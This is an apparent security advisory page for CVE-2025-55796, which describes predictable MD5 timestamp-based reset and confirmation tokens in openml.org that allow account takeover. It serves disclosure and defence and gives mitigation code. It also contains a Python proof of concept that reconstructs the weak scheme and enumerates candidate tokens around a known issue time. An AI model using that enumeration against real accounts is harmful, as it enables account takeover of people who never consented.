CVE-2025-55796: n/a
The openml/openml.org web application version v2.0.20241110 uses predictable MD5-based tokens for critical user workflows such as signup confirmation, password resets, email confirmation resends, and email change confirmation. These tokens are generated by hashing the current timestamp formatted as "%d %H:%M:%S" without incorporating any user-specific data or cryptographic randomness. This predictability allows remote attackers to brute-force valid tokens within a small time window, enabling unauthorized account confirmation, password resets, and email change approvals, potentially leading to account takeover.
AI Analysis
Technical Summary
CVE-2025-55796 is a high-severity vulnerability in the openml/openml.org web application, version v2.0.20241110. The application derives the tokens used for signup confirmation, password resets, email confirmation resends and email change confirmations from an MD5 hash of the current time formatted as "%d %H:%M:%S", with no user-specific identifier and no cryptographic randomness. That format string carries only the day of the month, hour, minute and second, so the entire token space is at most 31 × 86,400 values, the same token reappears every month, and two users whose requests land in the same second receive identical tokens. An attacker who can trigger the workflow (for example by submitting a victim's address to the password reset form) knows to within seconds when the token was issued and only has to try the MD5 of each candidate timestamp around that moment, a few dozen to a few hundred guesses; the server clock can be calibrated by requesting a token for an account the attacker controls and inverting it the same way. Because the tokens authorise account confirmation, password resets and email changes, a successful guess yields account takeover. No authentication and no user interaction are required. The CVSS 3.1 base score of 7.5 recorded for this entry reflects a network attack vector, low attack complexity, no privileges and no user interaction, with impact scored only against availability; that scoring understates the outcome, since a forged password reset or email change compromises the integrity and confidentiality of the account, so defenders should not triage from the vector string alone. No patch or public exploit is reported at the time of writing, but the affected workflows warrant urgent remediation.
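To make the size of the candidate space concrete, the following Python example is added here for this page; it is not openml's source. The token construction is reconstructed from the CVE description (MD5 over "%d %H:%M:%S"), and the victim timestamp, the attacker's 17-second clock error and the ±60-second search window are constructed inputs. It enumerates every token the scheme could have issued around a known moment, recovers the issue time of a given token, and shows the cross-user collision and monthly repetition that follow from the format string.

```python
import hashlib
from datetime import datetime, timedelta

# Reconstruction of the weak scheme as the CVE description states it:
# MD5 of the current time formatted "%d %H:%M:%S" (day-of-month, hour, minute,
# second), nothing user-specific, no randomness. Not openml's actual source.
def weak_token(when: datetime) -> str:
    return hashlib.md5(when.strftime("%d %H:%M:%S").encode()).hexdigest()


def total_token_space() -> int:
    """Upper bound on distinct tokens the format can ever produce."""
    return 31 * 24 * 60 * 60          # 2,678,400


def candidate_tokens(center: datetime, window_seconds: int) -> dict:
    """Every token the server could have issued within +/- window_seconds of
    `center`, mapped to the first timestamp that produces it."""
    candidates = {}
    for delta in range(-window_seconds, window_seconds + 1):
        t = center + timedelta(seconds=delta)
        candidates.setdefault(weak_token(t), t)
    return candidates


def recover_issue_time(observed_token: str, center: datetime, window_seconds: int):
    """Attacker view: given a token and a rough idea of when it was issued,
    find the exact timestamp. In practice the attacker does not see the token
    and instead submits each candidate to the confirmation endpoint; the
    number of candidates is the same. Returns None if outside the window."""
    return candidate_tokens(center, window_seconds).get(observed_token)


# --- constructed scenario ---------------------------------------------------
# The victim's reset was triggered at this (constructed) time; the attacker's
# clock is 17 seconds off and they search a +/- 60 second window.
VICTIM_ISSUED_AT = datetime(2025, 3, 4, 9, 30, 12)
ATTACKER_GUESS = VICTIM_ISSUED_AT + timedelta(seconds=17)
WINDOW = 60


def attack_cost() -> int:
    """Worst-case number of guesses (HTTP requests) for the window above."""
    return len(candidate_tokens(ATTACKER_GUESS, WINDOW))


def tokens_collide_across_users() -> bool:
    """Two users whose requests land in the same second get the same token."""
    other_user_request = datetime(2025, 3, 4, 9, 30, 12, 999_000)
    return weak_token(VICTIM_ISSUED_AT) == weak_token(other_user_request)


def tokens_repeat_monthly() -> bool:
    """Only the day-of-month is encoded, so the token reappears next month."""
    return weak_token(VICTIM_ISSUED_AT) == weak_token(VICTIM_ISSUED_AT.replace(month=4))


if __name__ == "__main__":
    token = weak_token(VICTIM_ISSUED_AT)
    print("victim token:        ", token)
    print("candidates to try:   ", attack_cost())
    print("total token space:   ", total_token_space())
    print("recovered issue time:", recover_issue_time(token, ATTACKER_GUESS, WINDOW))
```

The window size is the only thing the attacker has to get right; because they usually trigger the reset themselves, a window of a minute or two is generous, and the 121 guesses it costs are far below what any unthrottled web endpoint will tolerate.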
Potential Impact
For European organisations using openml.org, or running the affected version themselves, the practical risk is account takeover rather than mere disruption: an attacker who can request a reset for a victim's address can guess the resulting token, set a new password, confirm an account the victim never finished creating, or move the account to an attacker-controlled email address. Organisations relying on openml.org for scientific data sharing, machine learning experiments and collaborative research may face unauthorised changes to data and experiments attributed to compromised accounts, loss of access for the legitimate owner, and reputational damage. The impact is greater where accounts hold elevated privileges or access to sensitive data. The published scoring treats the impact as availability only, but the integrity and confidentiality consequences of a hijacked account are the real concern. No exploitation in the wild is reported, which should not lower the priority: the attack needs nothing beyond knowledge of the token scheme and a few hundred requests. Academic and research institutions and companies across Europe that use openml.org are particularly exposed.
Mitigation Recommendations
Replace the token generator outright rather than salting it: derive every confirmation, reset and email-change token from a cryptographically secure random source (at least 128 bits, for example Python's secrets module), store only a hash of the token server-side together with the user id, the purpose and an expiry, and compare in constant time on redemption. For a stateless design, sign the user id, purpose and expiry with an HMAC under a server-side secret instead. Do not hash timestamps, user ids or email addresses, alone or in combination, with MD5 or anything else: all of those inputs are guessable, and the weakness lies in the inputs, not in the hash function. Keep lifetimes short, make tokens single-use, and invalidate a user's outstanding tokens when the password or email changes. Rate-limit and log failed validations on the confirmation endpoints; a burst of failures against one account within a short window is the signature of this attack. Require re-authentication or a second factor before an email change takes effect, and notify the previous address. Audit every workflow that relies on a token carried in a link for the same pattern. When informing users, bear in mind that password resets on an unpatched instance go through the same weak token, so deploy the fix before asking users to reset, and advise them to watch for confirmation or reset emails they did not request.
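The following Python sketch is added here as an illustration of the recommended replacement; it is example code written for this page, not a patch from the openml project. It issues tokens from the OS CSPRNG, persists only a SHA-256 digest bound to the user and the purpose, enforces expiry and single use, revokes outstanding tokens on account changes, and throttles validation attempts per client. The 15-minute lifetime, the attempt limit, the in-memory store, the purpose strings and the user ids are assumptions.

```python
import hashlib
import secrets
import time

TOKEN_TTL_SECONDS = 15 * 60      # assumed policy: a link is valid for 15 minutes
TOKEN_BYTES = 32                 # 256 bits of CSPRNG output per token


def _digest(token: str) -> str:
    # Only the digest is persisted, so a leaked table cannot be replayed, and
    # looking the digest up by key avoids comparing raw tokens byte by byte.
    return hashlib.sha256(token.encode()).hexdigest()


class TokenStore:
    """Pending one-time tokens for signup confirmation, password reset and
    email change. In-memory for the example; a deployment would keep the same
    fields in the application database."""

    def __init__(self):
        self._pending = {}   # digest -> (user_id, purpose, expires_at)

    def issue(self, user_id: int, purpose: str, now: float = None) -> str:
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(TOKEN_BYTES)      # unguessable, not time-derived
        self._pending[_digest(token)] = (user_id, purpose, now + TOKEN_TTL_SECONDS)
        return token          # goes into the email link; never log it

    def redeem(self, token: str, user_id: int, purpose: str, now: float = None) -> bool:
        """True exactly once, only for the user and purpose the token was issued
        for, and only before expiry. Every failure answers a bare 'invalid'."""
        now = time.time() if now is None else now
        key = _digest(token)
        entry = self._pending.get(key)
        if entry is None:
            return False
        stored_user, stored_purpose, expires_at = entry
        if now > expires_at:
            del self._pending[key]          # expired: drop it, never honour it
            return False
        if stored_user != user_id or stored_purpose != purpose:
            return False                    # a reset token cannot confirm an email change
        del self._pending[key]              # single use
        return True

    def revoke_all(self, user_id: int) -> None:
        """Call after a password or email change so older links die with it."""
        self._pending = {d: v for d, v in self._pending.items() if v[0] != user_id}


class AttemptLimiter:
    """Per-client cap on validation attempts at the confirmation endpoints.
    Assumed limit: 10 attempts per token lifetime, keyed by client address."""

    def __init__(self, max_attempts: int = 10, window: int = TOKEN_TTL_SECONDS):
        self.max_attempts = max_attempts
        self.window = window
        self._attempts = {}   # client key -> timestamps of recent attempts

    def allow(self, client_key: str, now: float = None) -> bool:
        now = time.time() if now is None else now
        recent = [t for t in self._attempts.get(client_key, []) if now - t < self.window]
        if len(recent) >= self.max_attempts:
            self._attempts[client_key] = recent
            return False                    # caller should log this and answer 429
        recent.append(now)
        self._attempts[client_key] = recent
        return True


if __name__ == "__main__":
    store, limiter = TokenStore(), AttemptLimiter()
    link_token = store.issue(user_id=7, purpose="password_reset")
    print("issued:", link_token)
    if limiter.allow("203.0.113.5"):
        print("first redeem :", store.redeem(link_token, 7, "password_reset"))
        print("second redeem:", store.redeem(link_token, 7, "password_reset"))
```

Binding the purpose matters as much as binding the user: with one generator serving four workflows, a token obtained through the least-protected flow must not be accepted by the others.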
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Switzerland, Italy, Spain
Technical Details
- Data Version: 5.2
- Assigner Short Name: mitre
- Date Reserved: 2025-08-16T00:00:00.000Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 691cac1d31331b1c39338b4e
Added to database: 11/18/2025, 5:25:49 PM
Last enriched: 11/18/2025, 5:26:02 PM
Last updated: 11/18/2025, 8:06:36 PM
Related Threats
- CVE-2025-37162: Vulnerability in Hewlett Packard Enterprise (HPE) HPE Aruba Networking 100 Series Cellular Bridge (Medium)
- CVE-2025-37161: Vulnerability in Hewlett Packard Enterprise (HPE) HPE Aruba Networking 100 Series Cellular Bridge (High)
- CVE-2025-63227: n/a (Critical)
- CVE-2025-63226: n/a (High)
- CVE-2025-63994: n/a (High)